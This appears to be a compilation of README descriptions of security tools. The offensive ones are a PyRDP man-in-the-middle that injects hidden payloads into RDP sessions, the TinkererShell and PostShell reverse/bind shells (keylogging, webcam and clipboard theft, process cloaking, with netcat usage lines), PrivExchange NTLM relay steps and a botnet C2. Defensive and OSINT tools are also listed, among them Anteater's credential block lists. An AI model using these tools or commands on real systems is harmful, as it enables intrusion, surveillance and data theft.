Before installing the dependencies, you need to activate your virtual environment:
source venv/bin/activate
Finally, you can install the project with Pip:
pip3 install -U pip setuptools wheel
pip3 install -U -e .
This should install all the dependencies required to run PyRDP.
If you ever want to leave your virtual environment, you can simply deactivate it:
deactivate
Note that you will have to activate your environment every time you want to have the PyRDP scripts available as shell commands.

Installing on Windows
The steps are almost the same. There are two additional prerequisites.
  1. Any C compiler
  2. OpenSSL. Make sure it is reachable from your $PATH.
Then, create your virtual environment in PyRDP's directory:
cd pyrdp
python3 -m venv venv
DO NOT use the root PyRDP directory for the virtual environment folder (python3 -m venv .). You will make a mess, and using a directory name like venv is more standard anyway.
Before installing the dependencies, you need to activate your virtual environment:
venv\Scripts\activate
Finally, you can install the project with Pip:
pip3 install -U pip setuptools wheel
pip3 install -U -e .
This should install all the dependencies required to run PyRDP.
If you ever want to leave your virtual environment, you can simply deactivate it:
deactivate
Note that you will have to activate your environment every time you want to have the PyRDP scripts available as shell commands.

Installing with Docker
First of all, build the image by executing this command at the root of PyRDP (where Dockerfile is located):
docker build -t pyrdp .
Afterwards, you can execute the following command to run the container:
docker run -it pyrdp pyrdp-mitm.py 192.168.1.10
For more information about the various commands and arguments, please refer to these sections:
To store the PyRDP output permanently (logs, files, etc.), add the -v option to the previous command. For example:
docker run -v /home/myname/pyrdp_output:/home/pyrdp/pyrdp_output pyrdp pyrdp-mitm.py 192.168.1.10
Make sure that your destination directory is owned by a user with a UID of 1000, otherwise you will get a permission denied error. If you're the only user on the system, you should not need to worry about this.

Using the player in Docker
Using the player will require you to export the DISPLAY environment variable from the host to the docker. This redirects the GUI of the player to the host screen. You also need to expose the host's network and stop Qt from using the MIT-SHM X11 Shared Memory Extension. To do so, add the -e and --net options to the run command:
docker run -e DISPLAY=$DISPLAY -e QT_X11_NO_MITSHM=1 --net=host pyrdp pyrdp-player.py
Keep in mind that exposing the host's network to the docker can compromise the isolation between your container and the host. If you plan on using the player, X11 forwarding using an SSH connection would be a more secure way.

Migrating away from pycrypto
Since pycrypto isn't maintained anymore, we chose to migrate to pycryptodome. If you get this error, it means that you are using the module pycrypto instead of pycryptodome.
[...]
File "[...]/pyrdp/pyrdp/pdu/rdp/connection.py", line 10, in <module>
from Crypto.PublicKey.RSA import RsaKey
ImportError: cannot import name 'RsaKey'
You will need to remove the module pycrypto and reinstall PyRDP.
pip3 uninstall pycrypto
pip3 install -U -e .

Using the PyRDP Man-in-the-Middle
Use pyrdp-mitm.py <ServerIP> or pyrdp-mitm.py <ServerIP>:<ServerPort> to run the MITM.
Assuming you have an RDP server running on 192.168.1.10 and listening on port 3389, you would run:
pyrdp-mitm.py 192.168.1.10
When running the MITM for the first time on Linux, a private key and certificate should be generated for you in ~/.config/pyrdp. These are used when TLS security is used on a connection. You can use them to decrypt PyRDP traffic in Wireshark, for example.

Specifying the private key and certificate
If key generation didn't work or you want to use a custom key and certificate, you can specify them using the -c and -k arguments:
pyrdp-mitm.py 192.168.1.10 -k private_key.pem -c certificate.pem

Connecting to the PyRDP player
If you want to see live RDP connections through the PyRDP player, you will need to specify the ip and port on which the player is listening using the -i and -d arguments. Note: the port argument is optional, the default port is 3000.
pyrdp-mitm.py 192.168.1.10 -i 127.0.0.1 -d 3000

Connecting to a PyRDP player when the MITM is running on a server
If you are running the MITM on a server and still want to see live RDP connections, you should use SSH remote port forwarding to forward a port on your server to the player's port on your machine. Once this is done, you pass 127.0.0.1 and the forwarded port as arguments to the MITM. For example, if port 4000 on the server is forwarded to the player's port on your machine, this would be the command to use:
pyrdp-mitm.py 192.168.1.10 -i 127.0.0.1 -d 4000

Running payloads on new connections
PyRDP has support for running console commands or PowerShell payloads automatically when new connections are made. Due to the nature of RDP, the process is a bit hackish and is not always 100% reliable. Here is how it works:
  1. Wait for the user to be authenticated.
  2. Block the client's input / output to hide the payload and prevent interference.
  3. Send a fake Windows+R sequence and run cmd.exe.
  4. Run the payload as a console command and exit the console. If a PowerShell payload is configured, it is run with powershell -enc <PAYLOAD> (see the encoding sketch after this list).
  5. Wait a bit to allow the payload to complete.
  6. Restore the client's input / output.
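The powershell -enc form referenced in step 4 is simply Base64 over the UTF-16LE encoding of the script; a tiny sketch (the payload string is only an example):
import base64

payload = "Write-Output 'hello from the mitm'"
encoded = base64.b64encode(payload.encode("utf-16-le")).decode()
print(f"powershell -enc {encoded}")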
For this to work, you need to set 3 arguments:
  • the payload
  • the delay before the payload starts
  • the payload's duration

Setting the payload
You can use one of the following arguments to set the payload to run:
  • --payload, a string containing console commands
  • --payload-powershell, a string containing PowerShell commands
  • --payload-powershell-file, a path to a PowerShell script

Choosing when to start the payload
For the moment, PyRDP does not detect when the user is logged on. You must give it an amount of time to wait for before running the payload. After this amount of time has passed, it will send the fake key sequences and expect the payload to run properly. To do this, you use the --payload-delay argument. The delay is in milliseconds. For example, if you expect the user to be logged in within the first 5 seconds, you would use the following arguments:
--payload-delay 5000
This could be made more accurate by leveraging some messages exchanged during RDPDR initialization. See this issue if you're interested in making this work better.

Choosing when to resume normal activity
Because there is no direct way to know when the console has stopped running, you must tell PyRDP how long you want the client's input / output to be blocked. We recommend you set this to the maximum amount of time you would expect the console that is running your payload to be visible. In other words, the amount of time you would expect your payload to complete. To set the payload duration, you use the --payload-duration argument with an amount of time in milliseconds. For example, if you expect your payload to take up to 5 seconds to complete, you would use the following argument:
--payload-duration 5000
This will block the client's input / output for 5 seconds to hide the console and prevent interference. After 5 seconds, input / output is restored back to normal.

Other MITM arguments
Run pyrdp-mitm.py --help for a full list of arguments.

Using the PyRDP Player
Use pyrdp-player.py to run the player.

Playing a replay file
You can use the menu to open a new replay file: File > Open.
You can also open replay files when launching the player:
pyrdp-player.py <FILE1> <FILE2> ...

Listening for live connections
The player always listens for live connections. By default, the listening port is 3000, but it can be changed:
pyrdp-player.py -p <PORT>

Changing the listening address
By default, the player only listens to connections coming from the local machine. We do not recommend opening up the player to other machines. If you still want to change the listening address, you can do it with -b:
pyrdp-player.py -b <ADDRESS>

Other player arguments
Run pyrdp-player.py --help for a full list of arguments.

Using the PyRDP Certificate Cloner
The PyRDP certificate cloner creates a brand new X509 certificate by using the values from an existing RDP server's certificate. It connects to an RDP server, downloads its certificate, generates a new private key and replaces the public key and signature of the certificate using the new private key. This can be used in a pentest if, for example, you're trying to trick a legitimate user into going through your MITM. Using a certificate that looks like a legitimate certificate could increase your success rate.

Cloning a certificate
You can clone a certificate by using pyrdp-clonecert.py:
pyrdp-clonecert.py 192.168.1.10 cert.pem -o key.pem
The -o parameter defines the path name to use for the generated private key.

Using a custom private key
If you want to use your own private key instead of generating a new one:
pyrdp-clonecert.py 192.168.1.10 cert.pem -i input_key.pem

Other cloner arguments
Run pyrdp-clonecert.py --help for a full list of arguments.

Using PyRDP as a Library
If you're interested in experimenting with RDP and making your own tools, head over to our documentation section for more information.

Using PyRDP with Bettercap
We developed our own Bettercap module, rdp.proxy, to man-in-the-middle all RDP connections on a given LAN. Check out this document for more information.

PyRDP Presentations

Contributing to PyRDP
See our contribution guidelines.

Acknowledgements
PyRDP uses code from the following open-source software:
  • RC4-Python for the RC4 implementation.
  • rdesktop for bitmap decompression.
  • rdpy for RC4 keys, the bitmap decompression bindings and the base GUI code for the PyRDP player.
  • FreeRDP for the scan code enumeration.


Anteater - CI/CD Gate Check Framework


Anteater is an open framework to prevent the unwanted merging of nominated strings, filenames, binaries, deprecated functions, staging environment code / credentials, etc. Anything that can be specified with regular expression syntax can be sniffed out by anteater.
You tell anteater exactly what you don't want to get merged, and anteater looks after the rest.
If anteater finds something, it exits with a non-zero code which in turn fails the build of your CI tool, with the idea that it would prevent a pull request merging. Any false positives are easily negated by using the same RegExp framework to cancel out the false match.
Entire projects may also be scanned, using a recursive directory walk.
With a few simple steps it can be easily implemented into a CI / CD workflow with tooling such as Travis CI, CircleCI, Gitlab CI/CD and Jenkins.
It is currently used in the Linux Foundation project 'OPNFV' as a means to provide automated security checks at gate, but as shown in the examples below, it can be used for other scenarios.
Anteater also integrates with the Virus Total API, so any binaries, public IP addresses or URLs found by anteater will be sent to the Virus Total API and a report will be returned. If any object is reported as malicious, it will fail the CI build job.
Example content is provided for those unsure of what to start with, and it is encouraged and welcomed to share any Anteater filter strings you find useful.

Why would I want to use this?
Anteater has many uses, and can easily be bent to cover your own specific needs.
First, as mentioned, it can be set up to block strings and files with a potential security impact or risk. This could include private keys, a shell history, aws credentials etc.
It is especially useful for ensuring that elements used in a staging / development environment don't find their way into a production environment.
Let's take a look at some examples:
apprun:
  regex: app\.run\s*\(.*debug.*=.*True.*\)
  desc: "Running flask in debug mode could potentially leak sensitive data"
The above will match code where a Flask server is set to run in debug mode, e.g. app.run(host='0.0.0.0', port=80, debug=True), which can be typical of a developer's environment and mistakenly staged into production.
For a rails app, this could be:
regex: \<%=.*debug.*%>
Even more simple, look for the following in most logging frameworks:
regex: log\.debug
Need to stop developers mistakenly adding a private key?
private_key:
  regex: -----BEGIN\sRSA\sPRIVATE\sKEY----
  desc: "This looks like it could be a private key"
How about credential files that would cause a job loss if ever leaked into production? Anteater works with file names too.
For Example:
jenkins\.plugins\.publish_over_ssh\.BapSshPublisherPlugin\.xml
Or even..
- \.pypirc
- \.gem\/credentials
- aws_access_key_id
- aws_secret_access_key
- LocalSettings\.php
If your app has its own custom secrets / config file, then it's very easy to add your own regular expressions. Everything is set using YAML formatting, so there is no need to change anteater's code.

Deprecated functions, classes etc
Another use is for when a project deprecates an old function, yet developers might still make pull requests using the old function name:
deprecated_function:
  regex: deprecated_function\(.*\)
  desc: This function was deprecated in release X, use Y function.
Or perhaps stopping people from using 1.x versions of a framework:
<script.src.*="https:\/\/ajax\.googleapis\.com\/ajax\/libs\/angularjs\/1.*<\/script>

What if I get false positives?
Easy: you set a RegExp to stop the match, kind of like RegExp'ception.
Let's say we want to stop use of MD5:
md245:
  regex: md[245]
  desc: "Insecure hashing algorithm"
This then incorrectly gets matched to the following:
mystring = int(amd500) * 4
We set a specific ignore RegEx, so the line matches and is then cancelled out by the ignore entry.
mystring.=.int\(amd500\).*
Yet other instances of MD5 continue to get flagged.
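The match-then-ignore flow can be illustrated with a few lines of Python (regexes copied from the md245 example above; this is not anteater's implementation):
import re

flag_re   = re.compile(r"md[245]")
ignore_re = re.compile(r"mystring.=.int\(amd500\).*")

for line in ["mystring = int(amd500) * 4", "digest = md5(data)"]:
    # A line is only reported if the flag regex hits and no ignore regex cancels it out.
    if flag_re.search(line) and not ignore_re.search(line):
        print(f"flagged: {line}")    # only the genuine md5 usage is reported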

Binaries
With anteater, if you pass the argument --binaries, any binary found causes a build failure on the originating pull request. It is not until a sha256 checksum is set within anteater's YAML ignore files that the build is allowed to pass.
This means you can block people from checking in compiled objects, images, PDFs etc. that may have an unknown origin or that may tamper with existing binary files.
An example:
$ anteater --binaries --project myproj --patchset /tmp/patch
Non Whitelisted Binary file: /folder/to/repo/images/pal.png
Please submit patch with this hash: 3aeae9c71e82942e2f34341e9185b14b7cca9142d53f8724bb8e9531a73de8b2
Let's enter the hash:
binaries:
  images/pal.png:
    - 3aeae9c71e82942e2f34341e9185b14b7cca9142d53f8724bb8e9531a73de8b2
Run the job again:
$ anteater --binaries --project myproj --patchset /tmp/patch
Found matching file hash for: /folder/to/repo/images/pal.png
This way we can be sure binaries are not tampered with, since any tampering results in a failed cryptographic signature / checksum.
Any binaries not having a sha256 checksum will also be sent to the Virus Total API for scanning.

Virus Total API
If the following flags (combined or individually) --ips, --urls, --binaries are used, anteater will perform a lookup to the Virus Total API.
IP addresses will have their DNS history checked for any previous or present connection with known blacklisted domains marked as malicious or containing malware.
URLs will be checked for any previous or present connection with known blacklisted domains marked as malicious or containing malware.
As mentioned, Binaries will be sent to Virus Total and verified as clean / infected.
For more details and in-depth documentation, please visit readthedocs
Last of all, if you do use anteater, I would love to know (twitter: @lukeahinds) and pull requests / issues are welcome!

Contribute
Contributions are welcome.
Please make a pull request in a new branch, and not master.
git checkout -b mypatch
git push origin mypatch
Unit tests and PEP8 checks are in tox, so simply run the tox command before pushing your code.
If your patch fixes an issue, please paste the issue URL into the commit message.


Shodan-Eye - Tool That Collects All The Information About All Devices Directly Connected To The Internet Using The Specified Keywords That You Enter



This tool collects all information about all devices that are directly connected to the internet with the specified keywords that you enter. This way you get a complete overview.
The types of devices that are indexed can vary enormously: from small desktops and refrigerators to nuclear power plants and everything in between. You can find everything using "your own" specified keywords. Examples can be found in the attached file:
The information obtained with this tool can be applied in many areas, a small example:
  • Network security: keep an eye on all devices in your company or at home that are exposed to the internet.
  • Vulnerabilities. And so much more.

Shodan
Shodan is a search engine that lets the user find specific types of computers (webcams, routers, servers, etc.) connected to the internet using a variety of filters. Some have also described it as a search engine of service banners, which are metadata that the server sends back to the client.
What is the difference with Google or another search engine? The most fundamental difference is that Shodan crawls the internet, whereas Google crawls the World Wide Web. However, the devices that support the World Wide Web are only a small part of what is actually connected to the Internet.

Shodan API key
For additional data gathering, you can enter a Shodan API key when prompted. A Shodan API key can be found here: https://account.shodan.io/register
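For reference, the kind of keyword search the tool performs can be reproduced with the official shodan Python library (the API key and query below are placeholders):
import shodan

api = shodan.Shodan("YOUR_API_KEY")
results = api.search("webcam")                    # any keyword from your list

print(f"Results found: {results['total']}")
for match in results["matches"][:5]:
    # Each match describes one internet-facing device/banner.
    print(match["ip_str"], match.get("port"), match.get("org"))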

A collection of search queries for Shodan is attached:
Shodan Dorks ... The Internet of Sh*t

I also want to make you aware that:
  • This was written for educational purpose and pentest only.
  • The author will not be responsible for any damage ..!
  • The author of this tool is not responsible for any misuse of the information.
  • You will not misuse the information to gain unauthorized access.
  • This information shall only be used to expand knowledge and not for causing malicious or damaging attacks.
  • Performing any hacks without written permission is illegal ..!



Video Shodan Eye on YouTube:
Link to: Shodan Eye on YouTube

Python:
I made this script in Python 2.7 (later I will change this to Python 3), but for now I think Python 2 is nicer, more beautiful and better. "It's kind of personal."

Install Shodan Eye on Linux:
git clone https://github.com/BullsEye0/shodan-eye.git
cd shodan-eye
pip install -r requirements.txt

Use:
python shodan-eye.py
(You will be asked for a Shodan API key)
Have fun ..!

Contact to coder
Facebook: https://www.facebook.com/jolandadekoff
linkedin: https://www.linkedin.com/in/jolandadekoff
Youtube: https://youtu.be/XCtWM-4ov2U
Facebook Page: https://www.facebook.com/ethical.hack.group
Facebook Group: https://www.facebook.com/groups/ethicalhacking.hacker


DetExploit - Software That Detect Vulnerable Applications, Not-Installed OS Updates And Notify To User


DetExploit is software that detects vulnerable applications and not-installed important OS updates on the system, and notifies the user about them.
As we know, most cyberattacks use vulnerabilities that were disclosed a year or more earlier.
I think this is a huge problem, and this kind of technology should be more powerful than technology that detects unknown malware or exploits.
This project is also my theme for the Mitou Jr project in Japan.
I wish, and work hard, to make this a huge OSS (Open Source Software) project that helps today's society.
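As a hedged sketch of one common way the installed-applications side of such a check is done on Windows (an assumption about the general approach, not necessarily DetExploit's code), the registry uninstall keys can be enumerated and the versions compared against a vulnerability database:
import winreg

UNINSTALL = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"

def installed_apps():
    # Yield (name, version) for every uninstall entry that exposes both values.
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, UNINSTALL) as root:
        for i in range(winreg.QueryInfoKey(root)[0]):
            try:
                with winreg.OpenKey(root, winreg.EnumKey(root, i)) as app:
                    name, _ = winreg.QueryValueEx(app, "DisplayName")
                    version, _ = winreg.QueryValueEx(app, "DisplayVersion")
                    yield name, version
            except OSError:
                continue    # entries without the expected values

for name, version in installed_apps():
    print(name, version)    # compare these against vulnerability database entries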

Demo
  • Demo Video Clip (v0.5, English, Click and jump to YouTube to play video)

Requirements

How to run
An executable build is not available yet.
It is planned to be available in a stable release.
# Install requirements
C:\path\to\DetExploit>pip install -r requirements.txt
# Move to src directory
C:\path\to\DetExploit>cd src
# Run CUI version using python (PATH needs to be configured if it is not already)
C:\path\to\DetExploit\src>python main.py
# Run GUI version using python (PATH needs to be configured if it is not already)
C:\path\to\DetExploit\src>python gui.py

Supported Database

Contact to developer


Stegify - Go Tool For LSB Steganography, Capable Of Hiding Any File Within An Image

stegify is a simple command line tool capable of hiding any file within an image in a fully transparent way. This technique is known as LSB (Least Significant Bit) steganography.
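To make the LSB idea concrete, here is a small conceptual Python sketch (stegify itself is written in Go; this is not its implementation): each payload bit replaces the least significant bit of one carrier byte, which barely changes the pixel values.
def embed(carrier: bytearray, payload: bytes) -> bytearray:
    bits = [(byte >> i) & 1 for byte in payload for i in range(7, -1, -1)]
    if len(bits) > len(carrier):
        raise ValueError("carrier too small for payload")
    out = bytearray(carrier)
    for i, bit in enumerate(bits):
        out[i] = (out[i] & 0xFE) | bit     # overwrite only the lowest bit
    return out

def extract(carrier: bytes, n_bytes: int) -> bytes:
    bits = [b & 1 for b in carrier[:n_bytes * 8]]
    return bytes(sum(bit << (7 - j) for j, bit in enumerate(bits[i:i + 8]))
                 for i in range(0, len(bits), 8))

pixels = bytearray(range(256)) * 4             # stand-in for raw pixel data
secret = b"hello"
assert extract(embed(pixels, secret), len(secret)) == secret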

Demonstration

Carrier

Data

Results

The Result file contains the Data file hidden in it. And as you can see it is fully transparent.

Install
$ go get -u github.com/DimitarPetrov/stegify

Usage

As a command line tool
$ stegify -op encode -carrier <file-name> -data <file-name> -result <file-name>
$ stegify -op decode -carrier <file-name> -result <file-name>
When encoding, the file with name given to flag -data is hidden inside the file with name given to flag -carrier and the resulting file is saved in new file in the current working directory under the name given to flag -result. The file extension of result file is inherited from the carrier file and must not be specified explicitly in the -result flag.
When decoding, given a file name of a carrier file with previously encoded data in it, the data is extracted and saved in new file in the current working directory under the name given to flag -result. The result file won't have any file extension and therefore it should be specified explicitly in -result flag.
In both cases the -result flag can be omitted, and the default file name result will be used.

Programmatically in your code
stegify can be used programmatically too, and it provides easy-to-use functions working with file names or raw Readers and Writers. You can visit the godoc of the steg package for details.

Disclaimer
If the carrier file is in jpeg or jpg format, the result image will be png encoded after encoding (and may therefore be bigger in size), despite the file extension inherited from the original carrier file (which is .jpeg or .jpg).


TinkererShell - A Simple Python Reverse Shell Written Just For Fun

A simple reverse shell written in Python 3.7 just for fun. It currently supports Windows and Linux and integrates some basic features like keylogging and AES-encrypted communications.
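As an illustration of the AES-encrypted communications (a generic PyCryptodome sketch, not the tool's actual wire protocol):
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes

key = get_random_bytes(16)                       # shared secret (placeholder)

def seal(plaintext: bytes) -> bytes:
    cipher = AES.new(key, AES.MODE_EAX)
    ciphertext, tag = cipher.encrypt_and_digest(plaintext)
    return cipher.nonce + tag + ciphertext       # 16-byte nonce + 16-byte tag + data

def open_msg(blob: bytes) -> bytes:
    nonce, tag, ciphertext = blob[:16], blob[16:32], blob[32:]
    cipher = AES.new(key, AES.MODE_EAX, nonce=nonce)
    return cipher.decrypt_and_verify(ciphertext, tag)    # raises if tampered with

assert open_msg(seal(b"whoami")) == b"whoami"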

Supported operating systems:
  • Windows
  • Linux
  • OSX

Functions and characteristics:
  • Reverse connection.
  • AES encrypted communications.
  • Multithreaded.
  • Support multiple bots connected at the same time.
  • Keylogger.
  • Possibility to take screenshots of bot's monitors.
  • Possibility to take pictures using bot's webcam.
  • Possibility to steal bot's clipboard's content.
  • Possibility to enable or disable persistence (before payload delivery or later via remote control).
  • Possibility to enable or disable keylogger (before payload delivery or later via remote control).
  • Simple DNS spoofer (via hosts file).
  • Capability to upload and download files to and from the bot.
Work in progress... stay tuned!

TODO:
  • Thoroughly test persistence function on Linux.
  • Thoroughly test persistence function on Windows.
  • Add webcam stream and microphone recording (ideally streaming from bot and saving locally to master).
This project is for educational purposes only. Don't use it for illegal activities. I don't support nor condone illegal or unethical actions and I can't be held responsible for possible misuse of this software.


PostShell - Post Exploitation Bind/Backconnect Shell


PostShell is a post-exploitation shell that includes both a bind and a back connect shell. It creates a fully interactive TTY which allows for job control. The stub size is around 14kb and can be compiled on any Unix like system.

Why not use a traditional Backconnect/Bind Shell?
PostShell allows for easier post-exploitation by making the attacker less dependent on dependencies such as Python and Perl. It also incorporates both a back connect and a bind shell, meaning that if a target doesn't allow outgoing connections, an operator can simply start a bind shell and connect to the machine remotely. PostShell is also significantly less suspicious than a traditional shell due to the fact that both the process name and arguments are cloaked.

Features
  • Anti-Debugging, if ptrace is detected as being attached to the shell it will exit.
  • Process Name/Thread names are cloaked, a fake name overwrites all of the system arguments and file name to make it seem like a legitimate program.
  • TTY, a TTY is created which essentially allows for the same usage of the machine as if you were connected via SSH.
  • Bind/Backconnect shell, both a bind shell and back connect can be created.
  • Small Stub Size, a very small stub(<14kb) is usually generated.
  • Automatically Daemonizes
  • Tries to set GUID/UID to 0 (root)

Getting Started
  1. Downloading: git clone https://github.com/rek7/postshell
  2. Compiling: cd postshell && sh compile.sh. This should create a binary called "stub", which is the malware.

Commands
$ ./stub
Bind Shell Usage: ./stub port
Back Connect Usage: ./stub ip port
$

Example Usage
Backconnect:
$ ./stub 127.0.0.1 13377
Bind Shell:
$ ./stub 13377

Receiving a Connection with Netcat
Receiving a backconnect:
$ nc -vlp port
Connecting to a bind Shell:
$ nc host port

TODO:
  • Add domain resolution



PrivExchange - Exchange Your Privileges For Domain Admin Privs By Abusing Exchange


POC tools accompanying the blog Abusing Exchange: One API call away from Domain Admin.

Requirements
These tools require impacket. You can install it from pip with pip install impacket, but it is recommended to use the latest version from GitHub.

privexchange.py
This tool simply logs in on Exchange Web Services to subscribe to push notifications. This will make Exchange connect back to you and authenticate as system.
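Conceptually, that subscription is an NTLM-authenticated SOAP request to the EWS endpoint that points the push-notification URL at the attacker. A rough sketch using the requests and requests_ntlm packages follows; the hostnames, credentials and exact SOAP body are placeholders, and the real tool builds the full request for you.

import requests
from requests_ntlm import HttpNtlmAuth

EXCHANGE = "https://exchange.corp.local/EWS/Exchange.asmx"  # placeholder host
ATTACKER_URL = "http://attacker.corp.local/privexchange/"   # placeholder listener

# Approximate EWS push-subscription body; the XML privexchange.py sends may differ.
SOAP_BODY = f"""<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
               xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages"
               xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types">
  <soap:Body>
    <m:Subscribe>
      <m:PushSubscriptionRequest SubscribeToAllFolders="true">
        <t:EventTypes><t:EventType>NewMailEvent</t:EventType></t:EventTypes>
        <t:StatusFrequency>1</t:StatusFrequency>
        <t:URL>{ATTACKER_URL}</t:URL>
      </m:PushSubscriptionRequest>
    </m:Subscribe>
  </soap:Body>
</soap:Envelope>"""

resp = requests.post(
    EXCHANGE,
    data=SOAP_BODY,
    headers={"Content-Type": "text/xml; charset=utf-8"},
    auth=HttpNtlmAuth("CORP\\lowpriv", "Password1"),  # placeholder credentials
    verify=False,
)
print(resp.status_code)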

httpattack.py
Attack module that can be used with ntlmrelayx.py to perform the attack without credentials. To get it working:
  • Modify the attacker URL in httpattack.py to point to the attacker's server where ntlmrelayx will run
  • Clone impacket from GitHub git clone https://github.com/SecureAuthCorp/impacket
  • Copy this file into the /impacket/impacket/examples/ntlmrelayx/attacks/ directory.
  • cd impacket
  • Install the modified version of impacket with pip install . --upgrade or pip install -e .


ACT Platform - Open Platform For Collection And Exchange Of Threat Intelligence Information


Semi-Automated Cyber Threat Intelligence (ACT) is a research project led by mnemonic with contributions from the University of Oslo, NTNU, the Norwegian Security Authority (NSM), KraftCERT and Nordic Financial CERT.
The main objective of the ACT project is to develop a platform for cyber threat intelligence to uncover cyber attacks, cyber espionage and sabotage. The project will result in new methods for data enrichment and data analysis to enable identification of threat agents, their motives, resources and attack methodologies. In addition, the project will develop new methods, work processes and mechanisms for creating and distributing threat intelligence and countermeasures to stop ongoing and prevent future attacks.
In this repository the code of the ACT platform is published under an Open Source license.

Usage
The ACT platform exposes a set of REST APIs. See this guideline on how to work with the API.

Installation

Prerequisites
  • Java 8 for running the application.
  • Maven for managing dependencies, building the code, running the unit tests, etc.
  • An installation of Apache Cassandra for storage. Any version of Apache Cassandra 3.x is supported.
    • Import the Cassandra database schema from deployment-service/resources/cassandra.cql.
  • An installation of Elasticsearch for indexing. Version 6.8 of Elasticsearch is required.
  • (Optional) An installation of ActiveMQ for the multi-node environment.
  • (Optional) An installation of Docker for running the integration tests.

Compilation
  • Execute mvn clean install -DskipTests from the repository's root folder to compile the code.
  • Afterwards follow the deployment guide to run the application.

Testing
  • Download a Cassandra image by docker pull cassandra.
  • Download an Elasticsearch image by docker pull docker.elastic.co/elasticsearch/elasticsearch:6.8.2.
  • Download an ActiveMQ image by docker pull webcenter/activemq.
  • Execute mvn clean install for running all tests including integration tests.
  • Execute mvn clean install -DskipSlowTests for skipping the integration tests.
  • By default the integration tests will try to connect to Docker on localhost and port 2375. Set the $DOCKER_HOST environment variable to override this behaviour.


Stardox - Github Stargazers Information Gathering Tool


Stardox is an advanced GitHub stargazers information gathering tool. It scrapes GitHub for information and displays it in a list tree view. It can be used to collect details about the stargazers of your own or someone else's repository (a small sketch of gathering the same data via the GitHub API follows the list below).

What data it fetches:
  1. Total repositories
  2. Total stars
  3. Total followers
  4. Total following
  5. Stargazers' emails
P.S: Many new things will be added soon.
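The same kind of data can also be gathered through the GitHub REST API instead of scraping; a minimal sketch (the repository name is a placeholder, and unauthenticated API calls are rate-limited):

import requests

OWNER, REPO = "0xprateek", "stardox"      # placeholder repository

stargazers = requests.get(
    f"https://api.github.com/repos/{OWNER}/{REPO}/stargazers"
).json()

for user in stargazers[:5]:               # keep the example small
    profile = requests.get(f"https://api.github.com/users/{user['login']}").json()
    print(profile["login"], profile["public_repos"], profile["followers"],
          profile["following"], profile.get("email"))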

Gallery
Fetching data of a repository. (screenshot)
List tree view of fetched data. (screenshot)

Getting Started

Steps to set up:
  1. git clone https://github.com/0xprateek/stardox
  2. cd stardox
  3. pip install -r requirements.txt

Starting Stardox:
  1. cd stardox/src
  2. a) Using Command line arguments
    python3 stardox.py https://github.com/Username/repository-URL
    b) Without Command line arguments
    python3 stardox.py

Usage:
 stardox.py [-h] [-v] repositoryURL

positional arguments:
 repositoryURL  Path to repository.

optional arguments:
 -h, --help     show this help message and exit
 -v, --verbose  Verbose


Project iKy v2.2.0 - Tool That Collects Information From An Email And Shows Results In A Nice Visual Interface


Project iKy is a tool that collects information from an email and shows results in a nice visual interface.

Visit the Gitlab Page of the Project

Video


Installation

Clone repository

git clone https://gitlab.com/kennbroorg/iKy.git

Install Backend


Redis
You must install Redis
wget http://download.redis.io/redis-stable.tar.gz
tar xvzf redis-stable.tar.gz
cd redis-stable
make
sudo make install
And turn on the server in a terminal
redis-server

Python stuff and Celery
You must install the libraries inside requirements.txt
pip install -r requirements.txt
And turn on Celery in another terminal, within the directory backend
./celery.sh
Finally, in another terminal, turn on the backend app from the backend directory
python app.py

Install Frontend


Node
First of all, install nodejs.

Dependencies
Inside the directory frontend install the dependencies
npm install

Turn on Frontend Server
Finally, to run frontend server, execute:
npm start

Browser

Open the browser at this URL

Config API Keys

Once the application is loaded in the browser, you should go to the API Keys option and load the values of the API keys that are needed.

  • Fullcontact: Generate the API keys from here
  • Twitter: Generate the API keys from here
  • Linkedin: Only the user and password of your account must be loaded

Disclaimer

Anyone who contributes or contributed to the project, including me, is not responsible for the use of the tool (Neither the legal use nor the illegal use, nor the "other" use).
Keep in mind that this software was initially written for a joke, then for educational purposes (to educate ourselves), and now the goal is to collaborate with the community making quality free software, and while the quality is not excellent (sometimes not even good) we strive to pursue excellence.
Consider that all the information collected is free and available online, the tool only tries to discover, collect and display it.
Many times the tool cannot even achieve its goal of discovery and collection. Please load the necessary APIs before remembering my mother.
If even with the APIs it doesn't show "nice" things that you expect to see, try other e-mails before you remember my mother.
If you still do not see the "nice" things you expect to see, you can create an issue, contact us by e-mail or through any of our social networks, but keep in mind that my mother is neither the creator of nor a contributor to the project.
We do not refund your money if you are not satisfied.
I hope you enjoy using the tool as much as we enjoy doing it. The effort was and is enormous (Time, knowledge, coding, tests, reviews, etc.) but we would do it again.
Do not use the tool if you cannot read the instructions and / or this disclaimer clearly.
By the way, for those who insist on remembering my mother, she died many years ago but I love her as if she were right here.


Aura-Botnet - A Super Portable Botnet Framework With A Django-based C2 Server


Aura Botnet

C2 Server
The botnet's C2 server utilizes the Django framework as the backend. It is far from the most efficient web server, but this is offset by the following:
  • Django is extremely portable and therefore good for testing/educational purposes. The server and database are contained within the aura-server folder.
  • Django includes a very intuitive and powerful admin site that can be used for managing bots and commands
  • The server is only handling simple POST requests and returning text
  • Static files should be handled by a separate web server (local or remote) that excels in serving static files, such as nginx
The admin site located at http://your_server:server_port/admin can be accessed after setting up a superuser (see below).
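Assuming the standard Django manage.py layout inside the aura-server folder, the superuser can typically be created with:
python manage.py createsuperuser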

Database
The C2 server is currently configured to use a SQLite3 database, bots.sqlite3. The current configuration can be changed in aura-server/aura/settings.py. You may wish to use MySQL or even PostgreSQL instead; this is easy to do thanks to Django's portable database API.
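For example, pointing Django at PostgreSQL is a matter of editing the DATABASES dictionary in aura-server/aura/settings.py along these lines (database name, credentials and host below are placeholders, and the psycopg2 driver is required):

DATABASES = {
    "default": {
        "ENGINE": "django.db.backends.postgresql",
        "NAME": "bots",            # placeholder database name
        "USER": "aura",            # placeholder credentials
        "PASSWORD": "change-me",
        "HOST": "127.0.0.1",
        "PORT": "5432",
    }
}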

Bot Clients
The primary client is written in C++ and can be compiled for either Linux or Windows using CMake. Alternate clients are written in Rust, Bash, and PowerShell, but may lack certain functionality as they are mostly unsupported. I will fix any major bugs that come to my attention, but they will continue to lack certain features for the time being, such as running commands in different shells.
